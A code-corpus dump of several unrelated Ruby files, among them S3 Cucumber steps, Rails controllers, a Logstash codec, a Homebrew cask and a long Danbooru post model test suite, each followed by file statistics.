S3Client[:source].expected_size = S3Manager[:source].object_size
S3Manager[:source].download(file)
S3Client[:source].file_exist = File.exist?(file.path)
S3Client[:source].actual_size = file.size
end
end
When(/^I copy an existing object to \/(\S+)$/) do |uri|
# src (Given clause)
S3Client[:destination].expected_size = S3Manager[:source].object_size
# dst (When clause)
S3Client[:destination].s3_params = S3Manager.parse_s3_params(uri)
S3Manager[:destination].copy(S3Client[:source].s3_params)
S3Client[:destination].actual_size = S3Manager[:destination].object_size
end
When(/^I remove several existing objects "(.+)" from bucket \/(\S+)$/) do |keys, bucket|
begin
S3Manager[:source].delete_objects(bucket, keys.split('|'))
rescue => e
S3Client[:source].error = e
end
end
Then(/^I can verify the success of the upload$/) do
expect(S3Manager[:source].object_exists?).to be true
end
Then(/^I can verify the success of the copy$/) do
expect(S3Manager[:source].object_exists?).to be true
expect(S3Manager[:destination].object_exists?).to be true
end
Then(/^I can verify the success of the download$/) do
expect(S3Client[:source].file_exist).to be true
end
Then(/^I can verify the size$/) do
S3Client.each_client do |id|
expect(S3Client[id].actual_size).to eq(S3Client[id].expected_size)
end
end
Then(/^I can verify the success of the deletion$/) do
expect(S3Client[:source].error).to be nil
end
Then(/^I remove the object\(s\) for the next test$/) do
S3Client.each_client do |id|
S3Manager[id].delete_object
end
S3Client.wipe
end
def convert_size(size)
case size
when 'tiny'
1
when 'large'
20
else
fail 'Invalid size parameter'
end
end
| 28.484848 | 88 | 0.698227 |
ac61054bb6a44b1e0ee4d446354e174aed7247dd | 756 | # -*- encoding: us-ascii -*-
module Rubinius
class Configuration
def initialize
end
private :initialize
def get_variable(name)
Rubinius.primitive :vm_get_config_item
raise PrimitiveFailure, "Rubinius::Configuration#get_variable primitive failed"
end
def get_section(section)
Rubinius.primitive :vm_get_config_section
raise PrimitiveFailure, "Rubinius::Configuration#get_section primitive failed"
end
def section(section)
ary = get_section(section)
i = 0
while i < ary.size
tup = ary[i]
yield tup[0], tup[1]
i += 1
end
end
def [](name)
get_variable(name)
end
alias_method :get, :[]
end
Config = Configuration.new
end
| 19.384615 | 85 | 0.642857 |
87edf9d19d8870a3b9b1f139807ab8826828ba29 | 1,320 | require_relative 'lib/nba_advanced_stats/version'
Gem::Specification.new do |spec|
spec.name = "nba_advanced_stats"
spec.version = NbaAdvancedStats::VERSION
spec.authors = ["jessegan"]
spec.email = ["[email protected]"]
spec.summary = "Find out advanced statistics about NBA teams and their performance during any NBA season from 1980 to 2019."
#spec.description = %q{TODO: Write a longer description or delete this line.}
spec.homepage = "https://github.com/jessegan/nba-advanded-stats"
spec.license = "MIT"
spec.required_ruby_version = Gem::Requirement.new(">= 2.3.0")
#spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "https://github.com/jessegan/nba-advanded-stats"
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
end
| 45.517241 | 132 | 0.675758 |
08c9e45a73f650f62c6c7a64f2f584c723e8d9f5 | 839 | module Astrails
module Safe
class Gpg < Pipe
def compressed?
active? || @parent.compressed?
end
protected
def pipe
if key
rise RuntimeError, "can't use both gpg password and pubkey" if password
"|gpg -e -r #{key}"
elsif password
"|gpg -c --passphrase-file #{gpg_password_file(password)}"
end
end
def extension
".gpg" if active?
end
def active?
password || key
end
def password
@password ||= config[:gpg, :password]
end
def key
@key ||= config[:gpg, :key]
end
def gpg_password_file(pass)
return "TEMP_GENERATED_FILENAME" if $DRY_RUN
Astrails::Safe::TmpFile.create("gpg-pass") { |file| file.write(pass) }
end
end
end
end
| 19.511628 | 81 | 0.544696 |
acc6317c5f80b52a63470ab0756b496f5f76977d | 1,352 | module Cryptoexchange::Exchanges
module Crytrex
module Services
class Market < Cryptoexchange::Services::Market
class << self
def supports_individual_ticker_query?
true
end
end
def fetch(market_pair)
output = super(ticker_url(market_pair))
return if output.length == 0
# return if empty hash
adapt(output['stats'], market_pair)
end
def ticker_url(market_pair)
"#{Cryptoexchange::Exchanges::Crytrex::Market::API_URL}/stats?market=#{market_pair.target}¤cy=#{market_pair.base}"
end
def adapt(output, market_pair)
ticker = Cryptoexchange::Models::Ticker.new
ticker.base = market_pair.base
ticker.target = market_pair.target
ticker.market = Crytrex::Market::NAME
ticker.last = NumericHelper.to_d(output['last_price'])
ticker.change = NumericHelper.to_d(output['daily_change_percent'])
ticker.ask = NumericHelper.to_d(output['ask'])
ticker.bid = NumericHelper.to_d(output['bid'])
ticker.volume = NumericHelper.to_d(output['24h_volume'])
ticker.timestamp = nil
ticker.payload = output
ticker
end
end
end
end
end
| 32.190476 | 130 | 0.593935 |
e9d25aa29022d94cb8023c7e010437e6b140a22b | 518 | cask 'bitwig-studio' do
version '3.1.2'
sha256 '3245d845dd47ae71df6f403ad29fe6c517963ef1f5d153ea8c179bccad7fae83'
url "https://downloads.bitwig.com/stable/#{version}/Bitwig%20Studio%20#{version}.dmg"
appcast 'https://www.bitwig.com/en/download.html'
name 'Bitwig Studio'
homepage 'https://www.bitwig.com/'
app 'Bitwig Studio.app'
zap trash: [
'~/Library/Application Support/Bitwig',
'~/Library/Caches/Bitwig',
'~/Library/Logs/Bitwig',
]
end
| 28.777778 | 87 | 0.65251 |
ed51f22b5519f5dbb7752ee63777d82e48a910d5 | 2,078 | class SuggestionsController < ApplicationController
protect_from_forgery except: :index
before_action :set_suggestion, only: [:show, :edit, :edit_request, :update, :report]
before_action :new_image_manager_filter, only: [:show, :edit, :update, :new]
def index
@title = params[:title]
@category = params[:category]
@status = params[:status]
@address = params[:address]
@distance = params[:distance]
@suggestions = Suggestion.search_filter(@title, @category, @status, @address, @distance)
.paginate(:page => params[:page], :per_page => 10)
respond_to do |format|
format.html
format.js
end
end
def show
end
def new
@suggestion = Suggestion.new
end
def create
suggestion_builder = SuggestionBuilder.new
@suggestion = suggestion_builder.create(suggestion_params, params[:image1_id], params[:image2_id])
render :new and return if @suggestion.has_errors?
flash[:info] = I18n.t('suggestions.create.flash_create_ok') if @suggestion.visible?
flash[:info] = I18n.t('suggestions.create.flash_email_info') if [email protected]?
redirect_to @suggestion
end
def report
CityCouncilResponsiblePerson.all.each do |responsible_person|
SuggestionMailer.report_suggestion(@suggestion, responsible_person).deliver_later
end
flash[:info] = t('.flash_report_ok')
redirect_to @suggestion
end
private
def update_image(image_param, image_id)
return image_id if image_param.nil?
if image_param.blank?
@image_manager.delete_image(image_id) if !image_id.nil?
return nil
end
@image_manager.delete_image(image_id) if !image_id.nil?
hash = @image_manager.upload_image(image_param)
return hash['public_id']
end
def set_suggestion
@suggestion = Suggestion.friendly.find(params[:id])
end
def new_image_manager_filter
@image_manager = ImageManagerFactory.create.new
end
def suggestion_params
params.require(:suggestion).permit(:title, :category, :author, :email, :comment, :latitude, :longitude)
end
end
| 27.706667 | 107 | 0.717517 |
e97c1e6597c6e79c5a2bfe9c3df65d05ee113c35 | 1,705 | # Copyright 2014, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
module Google
# Module Auth provides classes that provide Google-specific authorization
# used to access Google APIs.
module Auth
VERSION = "0.17.0".freeze
end
end
| 46.081081 | 75 | 0.777713 |
62a6fd10cf079df8cff310e7c2ef0670f15346cd | 754 | class AdminController < ApplicationController
include SessionHelper
def index
unless is_logged?
head 401
return
end
unless current_user.kind == 'admin'
head 403
return
end
render :index
end
def coaches
unless is_logged?
head 401
return
end
unless current_user.kind == 'admin'
head 403
return
end
@coaches = Coach.includes(:user).all
render :coaches
end
def remove
unless is_logged?
head 401
return
end
unless current_user.kind == 'admin'
head 403
return
end
coach = Coach.find_by_id params[:id]
user = User.find_by_id coach.user_id
user.destroy
redirect_to '/admin/coaches/'
end
end
| 15.08 | 45 | 0.616711 |
e8384e11c2e4621fe68f33f276db7dc76926e67a | 966 | require "logstash/namespace"
require "logstash/event"
require "logstash/plugin"
require "logstash/logging"
# This is the base class for logstash codecs.
module LogStash::Codecs; class Base < LogStash::Plugin
include LogStash::Config::Mixin
config_name "codec"
def initialize(params={})
super
config_init(params)
register if respond_to?(:register)
end
public
def decode(data)
raise "#{self.class}#decode must be overidden"
end # def decode
alias_method :<<, :decode
public
def encode(data)
raise "#{self.class}#encode must be overidden"
end # def encode
public
def teardown; end;
public
def on_event(&block)
@on_event = block
end
public
def flush(&block)
# does nothing by default.
# if your codec needs a flush method (like you are spooling things)
# you must implement this.
end
public
def clone
return self.class.new(@params)
end
end; end # class LogStash::Codecs::Base
| 19.714286 | 71 | 0.694617 |
b9eee50887628166a9dc8db1912bc5ef7036e1fb | 1,174 | desc 'Creates a csv with all winners from a season'
task export_winners: :environment do
file = "#{Rails.root}/tmp/prizes.csv"
winners = []
Season.where('season_number in (?)', [7, 8, 9]).each do |season|
season.divisions.each do |div|
if div.tier == 1
div.league_participants.each { |lp| winners << lp }
else
div.league_participants
.order(score: :desc, mov: :desc, id: :asc)
.limit(1).each { |lp| winners << lp }
end
end
end
CSV.open(file, 'w') do |csv|
csv << [
'user_id', 'lp id', 'Public Name', 'Div tier',
'Div Letter', 'Season Number', 'Full Name',
'Email', 'street 1', 'street 2', 'city',
'province/state', 'zip', 'country'
]
winners.each do |lp|
csv << [
lp&.user&.id, lp.id, lp.name, lp.division.tier, lp.division.letter,
lp.division.season.season_number, lp.user.name, lp.user.email,
lp&.user&.address&.first_line,
lp&.user&.address&.second_line, lp&.user&.address&.city,
lp&.user&.address&.county_province, lp&.user&.address&.zip_or_postcode,
lp&.user&.address&.country
]
end
end
end
| 30.102564 | 79 | 0.583475 |
91fb7ebb04d73109c9fb2ebce29011022a4bd3ae | 1,308 | # frozen_string_literal: true
require "spec_helper"
class Dummy
include(::KaminariApiMetaData)
end
describe KaminariApiMetaData do
describe "VERSION" do
let(:current_version) { File.read("VERSION").split("\n").first }
it "is set from the VERSION file" do
expect(::KaminariApiMetaData::VERSION).to eq(current_version)
end
end
describe "#meta_data(collection, extra_meta = {})" do
let(:dummy) { Dummy.new }
let(:kaminari_collection) do
OpenStruct.new(
current_page: 1,
next_page: 2,
limit_value: 20,
prev_page: nil,
total_pages: 10,
total_count: 23
)
end
describe "with no extra meta data" do
let(:expected) do
{ current_page: 1, next_page: 2, per_page: 20, prev_page: nil, total_pages: 10, total_count: 23 }
end
it "returns meta attributes" do
expect(dummy.meta_data(kaminari_collection)).to(eq(expected))
end
end
describe "with extra meta data" do
let(:expected) do
{ current_page: 1, next_page: 2, per_page: 20, prev_page: nil, total_pages: 10, total_count: 23, foo: "bar" }
end
it "returns meta attributes" do
expect(dummy.meta_data(kaminari_collection, foo: "bar")).to(eq(expected))
end
end
end
end
| 24.679245 | 117 | 0.639908 |
01eb275343083342e2609f1dbcdd627832d2ccb8 | 99,942 | require 'test_helper'
class PostTest < ActiveSupport::TestCase
def assert_tag_match(posts, query)
assert_equal(posts.map(&:id), Post.tag_match(query).pluck(:id))
end
def self.assert_invalid_tag(tag_name)
should "not allow '#{tag_name}' to be tagged" do
post = build(:post, tag_string: "touhou #{tag_name}")
assert(post.valid?)
assert_equal("touhou", post.tag_string)
assert_equal(1, post.warnings[:base].grep(/Couldn't add tag/).count)
end
end
def setup
super
travel_to(2.weeks.ago) do
@user = FactoryBot.create(:user)
end
CurrentUser.user = @user
CurrentUser.ip_addr = "127.0.0.1"
mock_pool_archive_service!
end
def teardown
super
CurrentUser.user = nil
CurrentUser.ip_addr = nil
end
context "Deletion:" do
context "Expunging a post" do
setup do
@upload = UploadService.new(FactoryBot.attributes_for(:jpg_upload)).start!
@post = @upload.post
Favorite.add(post: @post, user: @user)
create(:favorite_group, post_ids: [@post.id])
end
should "delete the files" do
assert_nothing_raised { @post.file(:preview) }
assert_nothing_raised { @post.file(:original) }
@post.expunge!
assert_raise(StandardError) { @post.file(:preview) }
assert_raise(StandardError) { @post.file(:original) }
end
should "remove all favorites" do
@post.expunge!
assert_equal(0, Favorite.for_user(@user.id).where("post_id = ?", @post.id).count)
end
should "remove all favgroups" do
assert_equal(1, FavoriteGroup.for_post(@post.id).count)
@post.expunge!
assert_equal(0, FavoriteGroup.for_post(@post.id).count)
end
should "decrement the uploader's upload count" do
assert_difference("@post.uploader.reload.post_upload_count", -1) do
@post.expunge!
end
end
should "decrement the user's note update count" do
FactoryBot.create(:note, post: @post)
assert_difference(["@post.uploader.reload.note_update_count"], -1) do
@post.expunge!
end
end
should "decrement the user's post update count" do
assert_difference(["@post.uploader.reload.post_update_count"], -1) do
@post.expunge!
end
end
should "decrement the user's favorite count" do
assert_difference(["@post.uploader.reload.favorite_count"], -1) do
@post.expunge!
end
end
should "remove the post from iqdb" do
mock_iqdb_service!
Post.iqdb_sqs_service.expects(:send_message).with("remove\n#{@post.id}")
@post.expunge!
end
context "that is status locked" do
setup do
@post.update(is_status_locked: true)
end
should "not destroy the record" do
@post.expunge!
assert_equal(1, Post.where("id = ?", @post.id).count)
end
end
context "that belongs to a pool" do
setup do
# must be a builder to update deleted pools. must be >1 week old to remove posts from pools.
CurrentUser.user = FactoryBot.create(:builder_user, created_at: 1.month.ago)
SqsService.any_instance.stubs(:send_message)
@pool = FactoryBot.create(:pool)
@pool.add!(@post)
@deleted_pool = FactoryBot.create(:pool)
@deleted_pool.add!(@post)
@deleted_pool.update_columns(is_deleted: true)
@post.expunge!
@pool.reload
@deleted_pool.reload
end
should "remove the post from all pools" do
assert_equal([], @pool.post_ids)
end
should "remove the post from deleted pools" do
assert_equal([], @deleted_pool.post_ids)
end
should "destroy the record" do
assert_equal([], @post.errors.full_messages)
assert_equal(0, Post.where("id = ?", @post.id).count)
end
end
end
context "Deleting a post" do
setup do
Danbooru.config.stubs(:blank_tag_search_fast_count).returns(nil)
end
context "that is status locked" do
setup do
@post = FactoryBot.create(:post, is_status_locked: true)
end
should "fail" do
@post.delete!("test")
assert_equal(["Is status locked ; cannot delete post"], @post.errors.full_messages)
assert_equal(1, Post.where("id = ?", @post.id).count)
end
end
context "that is pending" do
setup do
@post = FactoryBot.create(:post, is_pending: true)
end
should "succeed" do
@post.delete!("test")
assert_equal(true, @post.is_deleted)
assert_equal(1, @post.flags.size)
assert_match(/test/, @post.flags.last.reason)
end
end
context "with the banned_artist tag" do
should "also ban the post" do
post = FactoryBot.create(:post, :tag_string => "banned_artist")
post.delete!("test")
post.reload
assert(post.is_banned?)
end
end
context "that is still in cooldown after being flagged" do
should "succeed" do
post = FactoryBot.create(:post)
post.flag!("test flag")
post.delete!("test deletion")
assert_equal(true, post.is_deleted)
assert_equal(2, post.flags.size)
end
end
should "toggle the is_deleted flag" do
post = FactoryBot.create(:post)
assert_equal(false, post.is_deleted?)
post.delete!("test")
assert_equal(true, post.is_deleted?)
end
end
end
context "Parenting:" do
context "Assigning a parent to a post" do
should "update the has_children flag on the parent" do
p1 = FactoryBot.create(:post)
assert(!p1.has_children?, "Parent should not have any children")
c1 = FactoryBot.create(:post, :parent_id => p1.id)
p1.reload
assert(p1.has_children?, "Parent not updated after child was added")
end
should "update the has_children flag on the old parent" do
p1 = FactoryBot.create(:post)
p2 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.parent_id = p2.id
c1.save
p1.reload
p2.reload
assert(!p1.has_children?, "Old parent should not have a child")
assert(p2.has_children?, "New parent should have a child")
end
end
context "Expunging a post with" do
context "a parent" do
should "reset the has_children flag of the parent" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.expunge!
p1.reload
assert_equal(false, p1.has_children?)
end
should "reassign favorites to the parent" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
user = FactoryBot.create(:user)
c1.add_favorite!(user)
c1.expunge!
p1.reload
assert(!Favorite.exists?(:post_id => c1.id, :user_id => user.id))
assert(Favorite.exists?(:post_id => p1.id, :user_id => user.id))
assert_equal(0, c1.score)
end
should "update the parent's has_children flag" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.expunge!
p1.reload
assert(!p1.has_children?, "Parent should not have children")
end
end
context "one child" do
should "remove the parent of that child" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
p1.expunge!
c1.reload
assert_nil(c1.parent)
end
end
context "two or more children" do
setup do
# ensure initial post versions won't be merged.
travel_to(1.day.ago) do
@p1 = FactoryBot.create(:post)
@c1 = FactoryBot.create(:post, :parent_id => @p1.id)
@c2 = FactoryBot.create(:post, :parent_id => @p1.id)
@c3 = FactoryBot.create(:post, :parent_id => @p1.id)
end
end
should "reparent all children to the first child" do
@p1.expunge!
@c1.reload
@c2.reload
@c3.reload
assert_nil(@c1.parent_id)
assert_equal(@c1.id, @c2.parent_id)
assert_equal(@c1.id, @c3.parent_id)
end
should "save a post version record for each child" do
assert_difference(["@c1.versions.count", "@c2.versions.count", "@c3.versions.count"]) do
@p1.expunge!
@c1.reload
@c2.reload
@c3.reload
end
end
should "set the has_children flag on the new parent" do
@p1.expunge!
assert_equal(true, @c1.reload.has_children?)
end
end
end
context "Deleting a post with" do
context "a parent" do
should "not reassign favorites to the parent by default" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
user = FactoryBot.create(:gold_user)
c1.add_favorite!(user)
c1.delete!("test")
p1.reload
assert(Favorite.exists?(:post_id => c1.id, :user_id => user.id))
assert(!Favorite.exists?(:post_id => p1.id, :user_id => user.id))
end
should "reassign favorites to the parent if specified" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
user = FactoryBot.create(:gold_user)
c1.add_favorite!(user)
c1.delete!("test", :move_favorites => true)
p1.reload
assert(!Favorite.exists?(:post_id => c1.id, :user_id => user.id), "Child should not still have favorites")
assert(Favorite.exists?(:post_id => p1.id, :user_id => user.id), "Parent should have favorites")
end
should "not update the parent's has_children flag" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.delete!("test")
p1.reload
assert(p1.has_children?, "Parent should have children")
end
should "clear the has_active_children flag when the 'move favorites' option is set" do
user = FactoryBot.create(:gold_user)
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.add_favorite!(user)
assert_equal(true, p1.reload.has_active_children?)
c1.delete!("test", :move_favorites => true)
assert_equal(false, p1.reload.has_active_children?)
end
end
context "one child" do
should "not remove the has_children flag" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
p1.delete!("test")
p1.reload
assert_equal(true, p1.has_children?)
end
should "not remove the parent of that child" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
p1.delete!("test")
c1.reload
assert_not_nil(c1.parent)
end
end
context "two or more children" do
should "not reparent all children to the first child" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c2 = FactoryBot.create(:post, :parent_id => p1.id)
c3 = FactoryBot.create(:post, :parent_id => p1.id)
p1.delete!("test")
c1.reload
c2.reload
c3.reload
assert_equal(p1.id, c1.parent_id)
assert_equal(p1.id, c2.parent_id)
assert_equal(p1.id, c3.parent_id)
end
end
end
context "Undeleting a post with a parent" do
should "update with a new approver" do
new_user = FactoryBot.create(:moderator_user)
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.delete!("test")
c1.approve!(new_user)
p1.reload
assert_equal(new_user.id, c1.approver_id)
end
should "preserve the parent's has_children flag" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.delete!("test")
c1.approve!
p1.reload
assert_not_nil(c1.parent_id)
assert(p1.has_children?, "Parent should have children")
end
end
end
context "Moderation:" do
context "A deleted post" do
setup do
@post = FactoryBot.create(:post, :is_deleted => true)
end
context "that is status locked" do
setup do
@post.update(is_status_locked: true)
end
should "not allow undeletion" do
approval = @post.approve!
assert_equal(["Post is locked and cannot be approved"], approval.errors.full_messages)
assert_equal(true, @post.is_deleted?)
end
end
context "that is undeleted" do
setup do
@mod = FactoryBot.create(:moderator_user)
CurrentUser.user = @mod
end
context "by the approver" do
setup do
@post.update_attribute(:approver_id, @mod.id)
end
should "not be permitted" do
approval = @post.approve!
assert_equal(false, approval.valid?)
assert_equal(["You have previously approved this post and cannot approve it again"], approval.errors.full_messages)
end
end
context "by the uploader" do
setup do
@post.update_attribute(:uploader_id, @mod.id)
end
should "not be permitted" do
approval = @post.approve!
assert_equal(false, approval.valid?)
assert_equal(["You cannot approve a post you uploaded"], approval.errors.full_messages)
end
end
end
context "when undeleted" do
should "be undeleted" do
@post.approve!
assert_equal(false, @post.reload.is_deleted?)
end
should "create a mod action" do
@post.approve!
assert_equal("undeleted post ##{@post.id}", ModAction.last.description)
assert_equal("post_undelete", ModAction.last.category)
end
end
context "when approved" do
should "be undeleted" do
@post.approve!
assert_equal(false, @post.reload.is_deleted?)
end
should "create a mod action" do
@post.approve!
assert_equal("undeleted post ##{@post.id}", ModAction.last.description)
assert_equal("post_undelete", ModAction.last.category)
end
end
should "be appealed" do
create(:post_appeal, post: @post)
assert(@post.is_deleted?, "Post should still be deleted")
assert_equal(1, @post.appeals.count)
end
end
context "An approved post" do
should "be flagged" do
post = FactoryBot.create(:post)
assert_difference("PostFlag.count", 1) do
post.flag!("bad")
end
assert(post.is_flagged?, "Post should be flagged.")
assert_equal(1, post.flags.count)
end
should "not be flagged if no reason is given" do
post = FactoryBot.create(:post)
assert_difference("PostFlag.count", 0) do
assert_raises(PostFlag::Error) do
post.flag!("")
end
end
end
end
context "An unapproved post" do
should "preserve the approver's identity when approved" do
post = FactoryBot.create(:post, :is_pending => true)
post.approve!
assert_equal(post.approver_id, CurrentUser.id)
end
context "that was previously approved by person X" do
setup do
@user = FactoryBot.create(:moderator_user, :name => "xxx")
@user2 = FactoryBot.create(:moderator_user, :name => "yyy")
@post = FactoryBot.create(:post, :approver_id => @user.id)
@post.flag!("bad")
end
should "not allow person X to reapprove that post" do
approval = @post.approve!(@user)
assert_includes(approval.errors.full_messages, "You have previously approved this post and cannot approve it again")
end
should "allow person Y to approve the post" do
@post.approve!(@user2)
assert(@post.valid?)
end
end
context "that has been reapproved" do
should "no longer be flagged or pending" do
post = FactoryBot.create(:post)
post.flag!("bad")
post.approve!
assert(post.errors.empty?, post.errors.full_messages.join(", "))
post.reload
assert_equal(false, post.is_flagged?)
assert_equal(false, post.is_pending?)
end
end
end
context "A status locked post" do
setup do
@post = FactoryBot.create(:post, is_status_locked: true)
end
should "not allow new flags" do
assert_raises(PostFlag::Error) do
@post.flag!("wrong")
end
end
should "not allow new appeals" do
@appeal = build(:post_appeal, post: @post)
assert_equal(false, @appeal.valid?)
assert_equal(["Post is active"], @appeal.errors.full_messages)
end
should "not allow approval" do
approval = @post.approve!
assert_includes(approval.errors.full_messages, "Post is locked and cannot be approved")
end
end
end
context "Tagging:" do
context "A post" do
setup do
@post = FactoryBot.create(:post)
end
context "as a new user" do
setup do
@post.update(:tag_string => "aaa bbb ccc ddd tagme")
CurrentUser.user = FactoryBot.create(:user)
end
should "not allow you to remove tags" do
@post.update(tag_string: "aaa")
assert_equal(["You must have an account at least 1 week old to remove tags"], @post.errors.full_messages)
end
should "allow you to remove request tags" do
@post.update(tag_string: "aaa bbb ccc ddd")
@post.reload
assert_equal("aaa bbb ccc ddd", @post.tag_string)
end
end
context "with a banned artist" do
setup do
CurrentUser.scoped(FactoryBot.create(:admin_user)) do
@artist = FactoryBot.create(:artist)
@artist.ban!
end
@post = FactoryBot.create(:post, :tag_string => @artist.name)
end
should "ban the post" do
assert_equal(true, @post.is_banned?)
end
end
context "with an artist tag that is then changed to copyright" do
setup do
CurrentUser.user = FactoryBot.create(:builder_user)
@post = Post.find(@post.id)
@post.update(:tag_string => "art:abc")
@post = Post.find(@post.id)
@post.update(:tag_string => "copy:abc")
@post.reload
end
should "update the category of the tag" do
assert_equal(Tag.categories.copyright, Tag.find_by_name("abc").category)
end
should "1234 update the category cache of the tag" do
assert_equal(Tag.categories.copyright, Cache.get("tc:#{Cache.hash('abc')}"))
end
should "update the tag counts of the posts" do
assert_equal(0, @post.tag_count_artist)
assert_equal(1, @post.tag_count_copyright)
assert_equal(0, @post.tag_count_general)
end
end
context "using a tag prefix on an aliased tag" do
setup do
FactoryBot.create(:tag_alias, :antecedent_name => "abc", :consequent_name => "xyz")
@post = Post.find(@post.id)
@post.update(:tag_string => "art:abc")
@post.reload
end
should "convert the tag to its normalized version" do
assert_equal("xyz", @post.tag_string)
end
end
context "tagged with a valid tag" do
subject { @post }
should allow_value("touhou 100%").for(:tag_string)
should allow_value("touhou FOO").for(:tag_string)
should allow_value("touhou -foo").for(:tag_string)
should allow_value("touhou pool:foo").for(:tag_string)
should allow_value("touhou -pool:foo").for(:tag_string)
should allow_value("touhou newpool:foo").for(:tag_string)
should allow_value("touhou fav:self").for(:tag_string)
should allow_value("touhou -fav:self").for(:tag_string)
should allow_value("touhou upvote:self").for(:tag_string)
should allow_value("touhou downvote:self").for(:tag_string)
should allow_value("touhou parent:1").for(:tag_string)
should allow_value("touhou child:1").for(:tag_string)
should allow_value("touhou source:foo").for(:tag_string)
should allow_value("touhou rating:z").for(:tag_string)
should allow_value("touhou locked:rating").for(:tag_string)
should allow_value("touhou -locked:rating").for(:tag_string)
# \u3000 = ideographic space, \u00A0 = no-break space
should allow_value("touhou\u3000foo").for(:tag_string)
should allow_value("touhou\u00A0foo").for(:tag_string)
end
context "tagged with an invalid tag" do
context "that doesn't already exist" do
assert_invalid_tag("user:evazion")
assert_invalid_tag("*~foo")
assert_invalid_tag("*-foo")
assert_invalid_tag(",-foo")
assert_invalid_tag("___")
assert_invalid_tag("~foo")
assert_invalid_tag("_foo")
assert_invalid_tag("foo_")
assert_invalid_tag("foo__bar")
assert_invalid_tag("foo*bar")
assert_invalid_tag("foo,bar")
assert_invalid_tag("foo\abar")
assert_invalid_tag("café")
assert_invalid_tag("東方")
end
context "that already exists" do
setup do
%W(___ ~foo _foo foo_ foo__bar foo*bar foo,bar foo\abar café 東方 new search).each do |tag|
build(:tag, name: tag).save(validate: false)
end
end
assert_invalid_tag("___")
assert_invalid_tag("~foo")
assert_invalid_tag("_foo")
assert_invalid_tag("foo_")
assert_invalid_tag("foo__bar")
assert_invalid_tag("foo*bar")
assert_invalid_tag("foo,bar")
assert_invalid_tag("foo\abar")
assert_invalid_tag("café")
assert_invalid_tag("東方")
assert_invalid_tag("new")
assert_invalid_tag("search")
end
end
context "tagged with a metatag" do
context "for typing a tag" do
setup do
@post = FactoryBot.create(:post, tag_string: "char:hoge")
@tags = @post.tag_array
end
should "change the type" do
assert(Tag.where(name: "hoge", category: 4).exists?, "expected 'moge' tag to be created as a character")
end
end
context "for typing an aliased tag" do
setup do
@alias = FactoryBot.create(:tag_alias, antecedent_name: "hoge", consequent_name: "moge")
@post = FactoryBot.create(:post, tag_string: "char:hoge")
@tags = @post.tag_array
end
should "change the type" do
assert_equal(["moge"], @tags)
assert(Tag.where(name: "moge", category: 0).exists?, "expected 'moge' tag to be created as a character")
assert(Tag.where(name: "hoge", category: 4).exists?, "expected 'moge' tag to be created as a character")
end
end
context "for a wildcard implication" do
setup do
@post = FactoryBot.create(:post, tag_string: "char:someone_(cosplay) test_school_uniform")
@tags = @post.tag_array
end
should "add the cosplay tag" do
assert(@tags.include?("cosplay"))
end
should "add the school_uniform tag" do
assert(@tags.include?("school_uniform"))
end
should "create the tag" do
assert(Tag.where(name: "someone_(cosplay)").exists?, "expected 'someone_(cosplay)' tag to be created")
assert(Tag.where(name: "someone_(cosplay)", category: 4).exists?, "expected 'someone_(cosplay)' tag to be created as character")
assert(Tag.where(name: "someone", category: 4).exists?, "expected 'someone' tag to be created")
assert(Tag.where(name: "school_uniform", category: 0).exists?, "expected 'school_uniform' tag to be created")
end
should "apply aliases when the character tag is added" do
FactoryBot.create(:tag, name: "jim", category: Tag.categories.general)
